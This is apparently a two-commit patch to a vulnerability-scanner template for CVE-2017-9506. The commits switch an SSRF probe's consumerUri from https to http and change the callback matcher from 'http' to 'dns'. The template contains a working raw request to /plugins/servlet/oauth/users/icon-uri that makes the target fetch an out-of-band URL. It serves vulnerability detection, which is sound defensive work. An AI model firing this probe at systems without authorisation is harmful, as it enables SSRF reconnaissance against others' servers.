From c5d4e5e40009b41266691b3495dbe4fbc0cb0e9c Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 9 Jun 2021 13:11:39 +0530 Subject: [PATCH 1/2] Update CVE-2017-9506.yaml --- cves/2017/CVE-2017-9506.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index 7a95222da5..0264cbe40c 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -14,7 +14,7 @@ info: requests: - raw: - | - GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1 + GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Connection: close @@ -26,4 +26,4 @@ requests: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" \ No newline at end of file + - "http" From 9045f0bb2afcb8f8b7bcca5337df0f0496d5e9ec Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 9 Jun 2021 14:23:32 +0530 Subject: [PATCH 2/2] misc changes --- cves/2017/CVE-2017-9506.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index 0264cbe40c..89ce454661 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -26,4 +26,4 @@ requests: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" + - "dns"